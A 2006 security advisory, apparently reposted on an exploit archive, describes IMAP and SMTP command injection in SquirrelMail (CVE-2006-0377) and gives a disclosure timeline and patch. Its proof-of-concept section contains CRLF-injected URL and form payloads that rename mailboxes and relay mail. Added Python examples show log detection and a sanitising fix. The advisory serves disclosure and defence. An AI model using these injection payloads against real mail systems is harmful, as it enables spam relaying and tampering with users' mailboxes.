
SquirrelFlaws.txt

Posted Mar 2, 2006
Authored by Vicente Aguilera Diaz

SquirrelMail versions 1.4.5 and below suffer from an IMAP injection flaw. Versions 1.2.7 and below suffer from an SMTP injection flaw. Details provided.

tags | exploit, imap
advisories | CVE-2006-0377
SHA-256 | 14cc0b04e833bc5ee62ab6fe916d63fc4a302e2b75777de081e7a43462ff2d3f

=============================================
INTERNET SECURITY AUDITORS ALERT 2006-002
- Original release date: February 27, 2006
- Last revised: February 27, 2006
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================
I. VULNERABILITY
-------------------------
IMAP/SMTP Injection in SquirrelMail


II. BACKGROUND
-------------------------
SquirrelMail is a standards-based webmail package written in PHP4. It
includes built-in pure PHP support for the IMAP and SMTP protocols,
and all pages render in pure HTML 4.0 (with no JavaScript required)
for maximum compatibility across browsers. It has very few
requirements and is very easy to configure and install. SquirrelMail
has all the functionality you would want from an email client,
including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.


III. DESCRIPTION
-------------------------
SquirrelMail provides a graphical interface for interacting with mail
servers over the IMAP and SMTP protocols.
SquirrelMail does not properly validate the commands and data it
transmits to the mail servers during normal use of the application
(mailbox management, e-mail reading and sending, etc.). As a result, an
authenticated malicious user could inject arbitrary IMAP/SMTP commands
into the mail servers used by SquirrelMail through the parameters that
the webmail front-end uses in its communication with these mail
servers.
This is dangerous because injecting these commands allows an intruder
to evade restrictions imposed at the application level and to exploit
vulnerabilities that could exist in the mail servers through IMAP/SMTP
commands.


IV. PROOF OF CONCEPT
-------------------------

== IMAP example (1.4.2 version) =============
SquirrelMail Vulnerable parameter: "mailbox"

When a user clicks on the subject of an e-mail, a GET request such as
the following is generated:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0

A malicious user can modify the value of the "mailbox" parameter and
inject any IMAP command.
The IMAP command injection has the following structure:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0A<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1

Example:
Injection of the RENAME IMAP command across the "mailbox" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1



== SMTP example (1.2.7 version) =============
SquirrelMail Vulnerable parameter: "subject" (and possibly others)

When a user sends a message, a POST request like the following is created:
POST http://<victim>/src/compose.php HTTP/1.1

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and
inject any SMTP command.
Example: Relay from a non-existent e-mail address

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept%0d%0a.%0d%0a%0d%0amail from:
hacker@domain.com%0d%0arcpt to:
victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a
-----------------------------84060780712450133071594948441
...
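
A detection-side view of the IMAP case above, as an added example that is not part of the original advisory: it URL-decodes query parameters from web access log lines and flags any value containing CR or LF. The log lines and the `crlf_params`/`scan` names are constructed for illustration; the second request path is the advisory's own RENAME example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def crlf_params(log_line):
    """Return [(param, decoded_value)] for query parameters whose
    decoded value contains CR or LF (a line break in IMAP/SMTP)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = []
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch %250D%250A.
        for candidate in (value, unquote(value)):
            if "\r" in candidate or "\n" in candidate:
                hits.append((name, candidate))
                break
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every flagged log line."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        hits = crlf_params(line)
        if hits:
            flagged.append((number, hits))
    return flagged

# Constructed sample entries (documentation IP range, made-up user).
SAMPLE_LOG = [
    '192.0.2.10 - alice [27/Feb/2006:10:00:01 +0000] "GET /src/read_body.php'
    '?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0 HTTP/1.1" 200 5120',
    '192.0.2.10 - alice [27/Feb/2006:10:00:07 +0000] "GET /src/read_body.php'
    '?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT'
    '%20%22INBOX&passed_id=22197&startMessage=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - alice [27/Feb/2006:10:00:09 +0000] "GET /src/read_body.php'
    '?mailbox=Sent%250D%250Ax&passed_id=3 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, [(name, repr(value)) for name, value in hits])
```

The SMTP case travels in a POST body, which standard access logs do not record, so the same check would have to run where the request body is visible.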


V. BUSINESS IMPACT
-------------------------
IMAP/SMTP command injection allows mail relaying, spam, exploitation of
IMAP and SMTP vulnerabilities in the mail servers, and evasion of all
restrictions at the application layer.


VI. SYSTEMS AFFECTED
-------------------------
IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).


VII. SOLUTION
-------------------------
Replace \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15
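
The effect of the fix described above, as an added Python sketch (not SquirrelMail's PHP code and not the vendor patch): it builds a SELECT command with and without CR/LF removal and counts the lines the IMAP server would parse. All function names are hypothetical; the quote escaping and the header helper go beyond what the advisory specifies and are assumptions of this example.

```python
# Translation table that deletes CR and LF.
_NO_LINE_BREAKS = str.maketrans("", "", "\r\n")

def strip_line_breaks(value):
    """Remove CR and LF, the fix the advisory gives for $mailbox."""
    return value.translate(_NO_LINE_BREAKS)

def imap_quoted(value):
    """IMAP quoted string: backslash-escape backslash and double quote
    (assumption of this example, following RFC 3501 quoting)."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'

def unsafe_select(tag, mailbox):
    # Pattern the advisory describes: the parameter reaches the server
    # unchecked, so an embedded CRLF ends SELECT and starts new commands.
    return f'{tag} SELECT "{mailbox}"\r\n'

def safe_select(tag, mailbox):
    # CR/LF removed first, then quoted: always exactly one command line.
    return f"{tag} SELECT {imap_quoted(strip_line_breaks(mailbox))}\r\n"

def header_line(name, value):
    """Same rule applied to a message header such as Subject."""
    return f"{name}: {strip_line_breaks(value)}\r\n"

def command_lines(wire):
    """Split the bytes that would be sent into the lines a server parses."""
    return [line for line in wire.split("\r\n") if line]

# Decoded "mailbox" value from the advisory's RENAME example.
PAYLOAD = 'INBOX"\r\nZ900 RENAME Trash Basura\r\nZ910 SELECT "INBOX'

if __name__ == "__main__":
    print(command_lines(unsafe_select("A001", PAYLOAD)))  # three commands
    print(command_lines(safe_select("A001", PAYLOAD)))    # one command
```

After the fix the server sees a single SELECT for a mailbox name that does not exist, instead of three separate tagged commands.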


VIII. REFERENCES
-------------------------
- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377


IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Vicente
Aguilera Diaz (vaguilera=at=isecauditors=dot=com).


X. REVISION HISTORY
-------------------------
January 12, 2006: Initial release
January 20, 2006: Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated


XI. DISCLOSURE TIMELINE
-------------------------
December, 2005 Vulnerability acquired by Vicente Aguilera Diaz
(Internet Security Auditors)
January 12, 2006 Initial vendor notification sent.
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and
1.5.1 cvs.
February 15, 2006 The vendor published the vulnerability in the
security section.
February 25, 2006 The CVE-2006-0377 is updated.

